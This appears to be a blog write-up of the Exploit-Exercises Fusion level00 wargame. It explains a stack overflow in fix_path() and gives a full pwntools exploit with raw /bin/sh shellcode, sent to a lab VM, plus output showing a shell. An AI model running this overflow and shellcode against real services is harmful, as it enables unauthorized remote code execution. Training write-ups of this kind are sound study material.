Fusion Level00
- There aren't any memory protections even NX. So i just use shell-code.
- That service is on port 20000. and be careful at 'fd'.
- In fix_path(), There is stack buffer overflow vulnerability.
- RET -> 140 ~ 143
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | from pwn import # dup2(0, 0) + dup2(0, 1) + dup2(0, 2) + execute /bin/sh sc = "\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" s = remote('192.168.56.136', 20000) buf = int((s.recv(1024).split(' '))[4], 16) print "[+] Buffer at %s" % hex(buf) payload = "GET " payload += "A"*139 payload += p32(buf + 158) # ret -> to shellcode payload += " HTTP/1.1" payload += sc s.send(payload) s.interactive() | cs |
1 2 3 4 5 6 | zero@ubuntu:~/Desktop$ python fusion0.py [+] Opening connection to 192.168.56.136 on port 20000: Done [+] Buffer at 0xbf919b88 [*] Switching to interactive mode $ id uid=20000 gid=20000 groups=20000 | cs |
'Wargames > Exploit-Exercises' 카테고리의 다른 글
| [Exploit-Exercise] Fusion level02 (0) | 2016.08.29 |
|---|---|
| [Exploit-Exercise] Fusion level01 (1) | 2016.08.29 |
| [Exploit-Exercise] Nubula Solutions (0) | 2015.11.25 |